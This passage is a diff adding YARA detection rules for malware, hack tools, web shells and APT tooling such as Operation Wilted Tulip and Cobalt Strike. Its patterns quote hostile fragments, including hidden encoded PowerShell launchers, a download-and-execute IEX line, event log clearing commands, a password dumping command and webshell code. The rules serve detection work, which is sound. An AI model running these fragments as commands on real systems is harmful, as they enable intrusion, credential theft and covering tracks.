+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "powershell" wide
+      $s2 = "pshcmd" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 30KB and all of them )
+}
+
+rule PowerShell_Emp_Eval_Jul17_A2_RID3142 : DEMO EXE FILE HKTL SCRIPT T1059_001 T1086 {
+   meta:
+      description = "Detects suspicious sample with PowerShell content "
+      author = "Florian Roth"
+      reference = "PowerShell Empire Eval"
+      date = "2017-07-27 13:14:51"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "e14c139159c23fdc18969afe57ec062e4d3c28dd42a20bed8ddde37ab4351a51"
+      tags = "DEMO, EXE, FILE, HKTL, SCRIPT, T1059_001, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "\\support\\Release\\ab.pdb" ascii
+      $s2 = "powershell.exe" ascii fullword
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+}
+
+rule WiltedTulip_Tools_back_RID2FE8 : APT DEMO EXE FILE HKTL T1003 {
+   meta:
+      description = "Detects Chrome password dumper used in Operation Wilted Tulip"
+      author = "Florian Roth"
+      reference = "http://www.clearskysec.com/tulip"
+      date = "2017-07-23 12:17:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-12-21"
+      hash1 = "b7faeaa6163e05ad33b310a8fdc696ccf1660c425fa2a962c3909eada5f2c265"
+      tags = "APT, DEMO, EXE, FILE, HKTL, T1003"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "%s.exe -f \"C:\\Users\\Admin\\Google\\Chrome\\TestProfile\" -o \"c:\\passlist.txt\"" fullword ascii
+      $x2 = "\\ChromePasswordDump\\Release\\FireMaster.pdb" ascii
+      $x3 = "//Dump Chrome Passwords to a Output file \"c:\\passlist.txt\"" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them )
+}
+
+rule WiltedTulip_Tools_clrlg_RID306B : APT DEMO SCRIPT {
+   meta:
+      description = "Detects Windows eventlog cleaner used in Operation Wilted Tulip - file clrlg.bat"
+      author = "Florian Roth"
+      reference = "http://www.clearskysec.com/tulip"
+      date = "2017-07-23 12:39:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "b33fd3420bffa92cadbe90497b3036b5816f2157100bf1d9a3b6c946108148bf"
+      tags = "APT, DEMO, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "('wevtutil.exe el') DO (call :do_clear" fullword ascii
+      $s2 = "wevtutil.exe cl %1" fullword ascii
+   condition: 
+      filesize < 1KB and 1 of them
+}
+
+rule WiltedTulip_powershell_RID302C : APT DEMO SCRIPT T1059_001 T1086 {
+   meta:
+      description = "Detects powershell script used in Operation Wilted Tulip"
+      author = "Florian Roth"
+      reference = "http://www.clearskysec.com/tulip"
+      date = "2017-07-23 12:28:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "e5ee1f45cbfdb54b02180e158c3c1f080d89bce6a7d1fe99dd0ff09d47a36787"
+      tags = "APT, DEMO, SCRIPT, T1059_001, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+" ascii
+   condition: 
+      1 of them
+}
+
+rule WiltedTulip_vminst_RID2E88 : APT DEMO EXE FILE MAL T1085 {
+   meta:
+      description = "Detects malware used in Operation Wilted Tulip"
+      author = "Florian Roth"
+      reference = "http://www.clearskysec.com/tulip"
+      date = "2017-07-23 11:18:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "930118fdf1e6fbffff579e65e1810c8d91d4067cbbce798c5401cf05d7b4c911"
+      tags = "APT, DEMO, EXE, FILE, MAL, T1085"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "\\C++\\Trojan\\Target\\" ascii
+      $s1 = "%s\\system32\\rundll32.exe" fullword wide
+      $s2 = "$C:\\Windows\\temp\\l.tmp" fullword wide
+      $s3 = "%s\\svchost.exe" fullword wide
+      $s4 = "args[10] is %S and command is %S" fullword ascii
+      $s5 = "LOGON USER FAILD " fullword ascii
+      $s6 = "vminst.tmp" fullword wide
+      $s7 = "operator co_await" fullword ascii
+      $s8 = "?ReflectiveLoader@@YGKPAX@Z" fullword ascii
+      $s9 = "%s -k %s" fullword wide
+      $s10 = "ERROR in %S/%d" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 900KB and ( 1 of ( $x* ) or 5 of ( $s* ) )
+}
+
+rule WiltedTulip_Windows_UM_Task_RID31C5 : APT DEMO T1053 T1053_005 T1085 {
+   meta:
+      description = "Detects a Windows scheduled task as used in Operation Wilted Tulip"
+      author = "Florian Roth"
+      reference = "http://www.clearskysec.com/tulip"
+      date = "2017-07-23 13:36:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "4c2fc21a4aab7686877ddd35d74a917f6156e48117920d45a3d2f21fb74fedd3"
+      tags = "APT, DEMO, T1053, T1053_005, T1085"
+      minimum_yara = "1.7"
+      
+   strings:
+      $r1 = "<Command>C:\\Windows\\syswow64\\rundll32.exe</Command>" fullword wide
+      $p1 = "<Arguments>\"C:\\Users\\public\\" wide
+      $c1 = "svchost64.swp\",checkUpdate" wide ascii
+      $c2 = "svchost64.swp,checkUpdate" wide ascii
+   condition: 
+      ( $r1 and $p1 ) or 1 of ( $c* )
+}
+
+rule WiltedTulip_WindowsTask_RID3065 : APT DEMO {
+   meta:
+      description = "Detects hack tool used in Operation Wilted Tulip - Windows Tasks"
+      author = "Florian Roth"
+      reference = "http://www.clearskysec.com/tulip"
+      date = "2017-07-23 12:38:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "c3cbe88b82cd0ea46868fb4f2e8ed226f3419fc6d4d6b5f7561e70f4cd33822c"
+      hash2 = "340cbbffbb7685133fc318fa20e4620ddf15e56c0e65d4cf1b2d606790d4425d"
+      hash3 = "b6f515b3f713b70b808fc6578232901ffdeadeb419c9c4219fbfba417bba9f01"
+      tags = "APT, DEMO"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "<Command>C:\\Windows\\svchost.exe</Command>" fullword wide
+      $x2 = "<Arguments>-nop -w hidden -encodedcommand" wide
+      $x3 = "-encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA" 
+   condition: 
+      1 of them
+}
+
+rule WiltedTulip_tdtess_RID2E7E : APT DEMO EXE FILE MAL T1035 {
+   meta:
+      description = "Detects malicious service used in Operation Wilted Tulip"
+      author = "Florian Roth"
+      reference = "http://www.clearskysec.com/tulip"
+      date = "2017-07-23 11:16:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "3fd28b9d1f26bd0cee16a167184c9f4a22fd829454fd89349f2962548f70dc34"
+      tags = "APT, DEMO, EXE, FILE, MAL, T1035"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "d2lubG9naW4k" fullword wide
+      $x2 = "C:\\Users\\admin\\Documents\\visual studio 2015\\Projects\\Export\\TDTESS_ShortOne\\WinService Template\\" ascii
+      $s1 = "\\WinService Template\\obj\\x64\\x64\\winlogin" ascii
+      $s2 = "winlogin.exe" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and ( 1 of ( $x* ) or 2 of them ) )
+}
+
+rule WiltedTulip_SilverlightMSI_RID315D : APT DEMO SCRIPT T1059_001 T1086 {
+   meta:
+      description = "Detects powershell tool call Get_AD_Users_Logon_History used in Operation Wilted Tulip"
+      author = "Florian Roth"
+      reference = "http://www.clearskysec.com/tulip"
+      date = "2017-07-23 13:19:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "c75906dbc3078ff81092f6a799c31afc79b1dece29db696b2ecf27951a86a1b2"
+      tags = "APT, DEMO, SCRIPT, T1059_001, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = ".\\Get_AD_Users_Logon_History.ps1 -MaxEvent" fullword ascii
+      $x2 = "if ((Resolve-dnsname $_.\"IP Address\" -Type PTR -TcpOnly -DnsOnly -ErrorAction \"SilentlyContinue\").Type -eq \"PTR\")" fullword ascii
+      $x3 = "$Client_Name = (Resolve-dnsname $_.\"IP Address\" -Type PTR -TcpOnly -DnsOnly).NameHost  " fullword ascii
+      $x4 = "########## Find the Computer account in AD and if not found, throw an exception ###########" fullword ascii
+   condition: 
+      ( filesize < 20KB and 1 of them )
+}
+
+rule WiltedTulip_matryoshka_Injector_RID33C7 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects hack tool used in Operation Wilted Tulip"
+      author = "Florian Roth"
+      reference = "http://www.clearskysec.com/tulip"
+      date = "2017-07-23 15:02:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "c41e97b3b22a3f0264f10af2e71e3db44e53c6633d0d690ac4d2f8f5005708ed"
+      hash2 = "b93b5d6716a4f8eee450d9f374d0294d1800784bc99c6934246570e4baffe509"
+      tags = "APT, DEMO, EXE, FILE"
+      required_modules = "pe"
+      minimum_yara = "3.0.0"
+      
+   strings:
+      $s1 = "Injector.dll" fullword ascii
+      $s2 = "ReflectiveLoader" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and all of them ) or ( pe.exports ( "__dec" ) and pe.exports ( "_check" ) and pe.exports ( "_dec" ) and pe.exports ( "start" ) and pe.exports ( "test" ) )
+}
+
+rule WiltedTulip_Zpp_RID2D21 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects hack tool used in Operation Wilted Tulip"
+      author = "Florian Roth"
+      reference = "http://www.clearskysec.com/tulip"
+      date = "2017-07-23 10:18:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-12-21"
+      hash1 = "10ec585dc1304436821a11e35473c0710e844ba18727b302c6bd7f8ebac574bb"
+      hash2 = "7d046a3ed15035ea197235980a72d133863c372cc27545af652e1b2389c23918"
+      hash3 = "6d6816e0b9c24e904bc7c5fea5951d53465c478cc159ab900d975baf8a0921cf"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "[ERROR] Error Main -i -s -d -gt -lt -mb" fullword wide
+      $x2 = "[ERROR] Error Main -i(with.) -s -d -gt -lt -mb -o -e" fullword wide
+      $s1 = "LT Time invalid" fullword wide
+      $s2 = "doCompressInNetWorkDirectory" fullword ascii
+      $s3 = "files remaining ,total file save = " fullword wide
+      $s4 = "$ec996350-79a4-477b-87ae-2d5b9dbe20fd" fullword ascii
+      $s5 = "Destinition Directory Not Found" fullword wide
+      $s6 = "\\obj\\Release\\ZPP.pdb" ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 30KB and ( 1 of ( $x* ) or 3 of them )
+}
+
+rule WiltedTulip_Netsrv_netsrvs_RID31DD : APT DEMO EXE FILE T1085 {
+   meta:
+      description = "Detects sample from Operation Wilted Tulip"
+      author = "Florian Roth"
+      reference = "http://www.clearskysec.com/tulip"
+      date = "2017-07-23 13:40:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "a062cb4364125427b54375d51e9e9afb0baeb09b05a600937f70c9d6d365f4e5"
+      hash2 = "afa563221aac89f96c383f9f9f4ef81d82c69419f124a80b7f4a8c437d83ce77"
+      hash3 = "acf24620e544f79e55fd8ae6022e040257b60b33cf474c37f2877c39fbf2308a"
+      tags = "APT, DEMO, EXE, FILE, T1085"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Process %d Created" fullword ascii
+      $s2 = "%s\\system32\\rundll32.exe" fullword wide
+      $s3 = "%s\\SysWOW64\\rundll32.exe" fullword wide
+      $c1 = "slbhttps" fullword ascii
+      $c2 = "/slbhttps" fullword wide
+      $c3 = "/slbdnsk1" fullword wide
+      $c4 = "netsrv" fullword wide
+      $c5 = "/slbhttps" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and ( all of ( $s* ) and 1 of ( $c* ) ) )
+}
+
+rule CobaltStrike_ReflectiveLoader_RID3297 : APT COBALTSTRIKE DEMO EXE FILE S0154 T1075 T1105 {
+   meta:
+      description = "Detects reflective loader (Cobalt Strike)"
+      author = "Florian Roth"
+      reference = "http://www.clearskysec.com/tulip"
+      date = "2017-07-23 14:11:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904"
+      hash2 = "1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a"
+      hash3 = "a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f"
+      tags = "APT, COBALTSTRIKE, DEMO, EXE, FILE, S0154, T1075, T1105"
+      required_modules = "pe"
+      minimum_yara = "3.0.0"
+      
+   strings:
+      $x1 = "powershell -nop -exec bypass -EncodedCommand \"%s\"" fullword ascii
+      $x2 = "%d is an x86 process (can't inject x64 content)" fullword ascii
+      $x3 = "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s" fullword ascii
+      $x4 = "Failed to impersonate token from %d (%u)" fullword ascii
+      $x5 = "Failed to impersonate logged on user %d (%u)" fullword ascii
+      $x6 = "%s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 600KB and 1 of them ) or ( 2 of them ) or pe.exports ( "_ReflectiveLoader@4" )
+}
+
+rule WiltedTulip_Matryoshka_RAT_RID3150 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Matryoshka RAT used in Operation Wilted Tulip"
+      author = "Florian Roth"
+      reference = "http://www.clearskysec.com/tulip"
+      date = "2017-07-23 13:17:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "6f208473df0d31987a4999eeea04d24b069fdb6a8245150aa91dfdc063cd64ab"
+      hash2 = "6cc1f4ecd28b833c978c8e21a20a002459b4a6c21a4fbaad637111aa9d5b1a32"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "%S:\\Users\\public" fullword wide
+      $s2 = "ntuser.dat.swp" fullword wide
+      $s3 = "Job Save / Load Config" fullword wide
+      $s4 = ".?AVPSCL_CLASS_JOB_SAVE_CONFIG@@" fullword ascii
+      $s5 = "winupdate64.com" fullword ascii
+      $s6 = "Job Save KeyLogger" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 1000KB and 3 of them )
+}
+
+rule Kekeo_Hacktool_RID2C94 : DEMO EXE FILE HKTL {
+   meta:
+      description = "Detects Kekeo Hacktool"
+      author = "Florian Roth"
+      reference = "https://github.com/gentilkiwi/kekeo/releases"
+      date = "2017-07-21 09:55:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "ce92c0bcdf63347d84824a02b7a448cf49dd9f44db2d02722d01c72556a2b767"
+      hash2 = "49d7fec5feff20b3b57b26faccd50bc05c71f1dddf5800eb4abaca14b83bba8c"
+      tags = "DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "[ticket %u] session Key is NULL, maybe a TGT without enough rights when WCE dumped it." fullword wide
+      $x2 = "ERROR kuhl_m_smb_time ; Invalid! Command: %02x - Status: %08x" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and ( 1 of ( $x* ) ) )
+}
+
+rule JS_Suspicious_Obfuscation_Dropbox_RID345D : DEMO OBFUS SCRIPT T1059_001 T1064 T1086 {
+   meta:
+      description = "Detects PowerShell AMSI Bypass"
+      author = "Florian Roth"
+      reference = "https://twitter.com/ItsReallyNick/status/887705105239343104"
+      date = "2017-07-19 15:27:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, OBFUS, SCRIPT, T1059_001, T1064, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "j\"+\"a\"+\"v\"+\"a\"+\"s\"+\"c\"+\"r\"+\"i\"+\"p\"+\"t\"" 
+      $x2 = "script:https://www.dropbox.com" ascii
+   condition: 
+      2 of them
+}
+
+rule JS_Suspicious_MSHTA_Bypass_RID30F1 : DEMO SCRIPT T1064 T1170 {
+   meta:
+      description = "Detects MSHTA Bypass"
+      author = "Florian Roth"
+      reference = "https://twitter.com/ItsReallyNick/status/887705105239343104"
+      date = "2017-07-19 13:01:21"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, SCRIPT, T1064, T1170"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "mshtml,RunHTMLApplication" ascii
+      $s2 = "new ActiveXObject(\"WScript.Shell\").Run(" ascii
+      $s3 = "/c start mshta j" ascii nocase
+   condition: 
+      2 of them
+}
+
+rule Exp_EPS_CVE20152545_RID2C5A : DEMO EXPLOIT FILE OFFICE {
+   meta:
+      description = "Detects EPS Word Exploit"
+      author = "Florian Roth"
+      reference = "Internal Research - ME"
+      date = "2017-07-19 09:45:31"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, EXPLOIT, FILE, OFFICE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "word/media/image1.eps" ascii
+      $s2 = "-la;7(la+" ascii
+   condition: 
+      uint16 ( 0 ) == 0x4b50 and ( $s1 and #s2 > 20 )
+}
+
+rule Unspecified_Malware_Jul17_2C_RID316E : CHINA DEMO EXE FILE MAL T1047 {
+   meta:
+      description = "Unspecified Malware - CN relation"
+      author = "Florian Roth"
+      reference = "https://goo.gl/CX3KaY"
+      date = "2017-07-18 13:22:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "e8156ec1706716cada6f57b6b8ccc9fb0eb5debe906ac45bdc2b26099695b8f5"
+      tags = "CHINA, DEMO, EXE, FILE, MAL, T1047"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "%AllUsersProfile%\\DeviceSync\\m.exe" fullword wide
+      $x2 = "freenow.chickenkiller.com" fullword ascii
+      $x3 = "\\Release\\PhantomNet-SSL.pdb" ascii
+      $s1 = "SELECT * FROM AntiVirusProduct" fullword ascii
+      $s2 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/%08X-%04X-%04X-%02X%02X%02X%02X" fullword ascii
+      $s3 = "Proxy-Authenticate: Basic" fullword ascii
+      $s4 = "Proxy-Authenticate: NTLM" fullword ascii
+      $s5 = "Root\\SecurityCenter2" fullword wide
+      $s6 = "aaabbbcccddd" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 400KB and ( 1 of ( $x* ) or 4 of ( $s* ) ) ) or ( all of them )
+}
+
+rule ReflectiveLoader_RID2D71 : DEMO EXE FILE HKTL MAL T1055 {
+   meta:
+      description = "Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-07-17 10:32:01"
+      score = 70
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2021-03-15"
+      tags = "DEMO, EXE, FILE, HKTL, MAL, T1055"
+      required_modules = "pe"
+      minimum_yara = "3.0.0"
+      
+   strings:
+      $x1 = "ReflectiveLoader_RID2D71" fullword ascii
+      $x2 = "ReflectivLoader.dll" fullword ascii
+      $x3 = "?ReflectiveLoader_RID2D71@@" ascii
+      $x4 = "reflective_dll.x64.dll" fullword ascii
+      $x5 = "reflective_dll.dll" fullword ascii
+      $fp1 = "Sentinel Labs, Inc." wide
+      $fp2 = "Panda Security, S.L." wide ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and ( 1 of ( $x* ) or pe.exports ( "ReflectiveLoader_RID2D71" ) or pe.exports ( "_ReflectiveLoader_RID2D71@4" ) or pe.exports ( "?ReflectiveLoader_RID2D71@@YGKPAX@Z" ) ) and not 1 of ( $fp* )
+}
+
+rule POSHSPY_Malware_RID2C6F : DEMO MAL {
+   meta:
+      description = "Detects"
+      author = "Florian Roth"
+      reference = "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html"
+      date = "2017-07-15 09:49:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "function sWP($cN, $pN, $aK, $aI)" fullword ascii
+      $x2 = "$aeK = [byte[]] (0x69, 0x87, 0x0b, 0xf2" ascii
+      $x3 = "(('variant', 'excretions', 'accumulators', 'winslow', 'whistleable', 'len'," 
+      $x4 = "$cPairKey = \"BwIAAACkAABSU0EyAAQAAAEAA" 
+      $x5 = "$exeRes = exePldRoutine" 
+      $x6 = "ZgB1AG4AYwB0AGkAbwBuACAAcAB1AHIAZgBDAHIA" 
+   condition: 
+      1 of them
+}
+
+rule CHAOS_Payload_RID2BA8 : DEMO EXE FILE HKTL {
+   meta:
+      description = "Detects a CHAOS back connect payload"
+      author = "Florian Roth"
+      reference = "https://github.com/tiagorlampert/CHAOS"
+      date = "2017-07-15 09:15:51"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "0962fcfcb1b52df148720c2112b036e75755f09279e3ebfce1636739af9b4448"
+      hash2 = "5c3553345f824b7b6de09ccb67d834e428b8df17443d98816471ca28f5a11424"
+      tags = "DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = { 2F 43 48 41 4F 53 00 02 73 79 6E 63 2F 61 74 6F 6D 69 63 } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 15000KB and all of them )
+}
+
+rule SecurityXploded_Producer_String_RID33B2 : DEMO EXE FILE HKTL {
+   meta:
+      description = "Detects hacktools by SecurityXploded"
+      author = "Florian Roth"
+      reference = "http://securityxploded.com/browser-password-dump.php"
+      date = "2017-07-13 14:58:51"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "d57847db5458acabc87daee6f30173348ac5956eb25e6b845636e25f5a56ac59"
+      tags = "DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "http://securityxploded.com" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and all of them )
+}
+
+rule PAS_Webshell_Encoded_RID2E9B : DEMO FILE T1100 WEBSHELL {
+   meta:
+      description = "Detects a PAS webshell"
+      author = "Florian Roth"
+      reference = "http://blog.talosintelligence.com/2017/07/the-medoc-connection.html"
+      date = "2017-07-11 11:21:41"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, FILE, T1100, WEBSHELL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $head1 = "<?php $____=" fullword ascii
+      $head2 = "'base'.(32*2).'" 
+      $enc1 = "isset($_COOKIE['___']" ascii
+      $enc2 = "if($___!==NULL){" ascii
+      $enc3 = ").substr(md5(strrev($" ascii
+      $enc4 = "]))%256);$" ascii
+      $enc5 = "]))@setcookie('" ascii
+      $enc6 = "]=chr(( ord($_" ascii
+      $x1 = { 3D 0A 27 29 29 3B 69 66 28 69 73 73 65 74 28 24 5F 43 4F 4F 4B 49 45 5B 27 } 
+      $foot1 = "value=\"\"/><input type=\"submit\" value=\"&gt;\"/></form>" 
+      $foot2 = "();}} @header(\"Status: 404 Not Found\"); ?>" 
+   condition: 
+      ( uint32 ( 0 ) == 0x68703f3c and filesize < 80KB and ( 3 of them or $head1 at 0 or $head2 in ( 0 .. 20 ) or 1 of ( $x* ) ) ) or $foot1 at ( filesize - 52 ) or $foot2 at ( filesize - 44 )
+}
+
+rule WinPayloads_PowerShell_RID2FE0 : DEMO HKTL SCRIPT T1059_001 T1086 {
+   meta:
+      description = "Detects WinPayloads PowerShell Payload"
+      author = "Florian Roth"
+      reference = "https://github.com/nccgroup/Winpayloads"
+      date = "2017-07-11 12:15:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "011eba8f18b66634f6eb47527b4ceddac2ae615d6861f89a35dbb9fc591cae8e"
+      tags = "DEMO, HKTL, SCRIPT, T1059_001, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "$Base64Cert = 'MIIJeQIBAzCCCT8GCSqGSIb3DQEHAaCCCTAEggksMIIJKDCCA98GCSqGSIb3DQEHBqCCA9AwggPMAgEAMIIDxQYJKoZIhvcNAQcBMBwGCiqGSIb3D" ascii
+      $x2 = "powershell -w hidden -noni -enc SQBF" fullword ascii nocase
+      $x3 = "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwA" ascii
+      $x4 = "powershell.exe -WindowStyle Hidden -enc JABjAGwAaQBlAG4AdAA" ascii
+   condition: 
+      filesize < 10KB and 1 of them
+}
+
+rule WinPayloads_Payload_RID2EA5 : DEMO EXE FILE HKTL {
+   meta:
+      description = "Detects WinPayloads Payload"
+      author = "Florian Roth"
+      reference = "https://github.com/nccgroup/Winpayloads"
+      date = "2017-07-11 11:23:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "23a24f99c3c6c00cd4bf6cb968f813ba2ceadfa846c7f169f412bcbb71ba6573"
+      hash2 = "35069905d9b7ba1fd57c8df03614f563504194e4684f47aafa08ebb8d9409d0b"
+      hash3 = "a28d107f168d85c38fc76229b14561b472e60e60973eb10b6b554c1f57469322"
+      tags = "DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "bpayload.exe.manifest" fullword ascii
+      $s2 = "spayload" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 10000KB and all of them )
+}
+
+rule Gen_Net_LocalGroup_Administrators_Add_Command_RID38C1 : DEMO EXE FILE GEN SUSP {
+   meta:
+      description = "Detects an executable that contains a command to add a user account to the local administrators group"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-07-08 18:34:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, EXE, FILE, GEN, SUSP"
+      minimum_yara = "2.2.0"
+      
+   strings:
+      $x1 = /net localgroup administrators [a-zA-Z0-9]{1,16} \/add/ nocase ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 400KB and 1 of them )
+}
+
+rule ZxShell_Related_Malware_CN_Group_Jul17_2_RID3602 : APT CHINA DEMO EXE FILE MAL T1077 {
+   meta:
+      description = "Detects a ZxShell related sample from a CN threat group"
+      author = "Florian Roth"
+      reference = "https://blogs.rsa.com/cat-phishing/"
+      date = "2017-07-08 16:37:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "204273675526649b7243ee48efbb7e2bc05239f7f9015fbc4fb65f0ada64759e"
+      tags = "APT, CHINA, DEMO, EXE, FILE, MAL, T1077"
+      minimum_yara = "1.7"
+      
+   strings:
+      $u1 = "User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)" fullword ascii
+      $u2 = "User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)" fullword ascii
+      $u3 = "User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0" fullword ascii
+      $u4 = "User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" fullword ascii
+      $x1 = "\\\\%s\\admin$\\g1fd.exe" fullword ascii
+      $x2 = "C:\\g1fd.exe" fullword ascii
+      $x3 = "\\\\%s\\C$\\NewArean.exe" fullword ascii
+      $s0 = "at \\\\%s %d:%d %s" fullword ascii
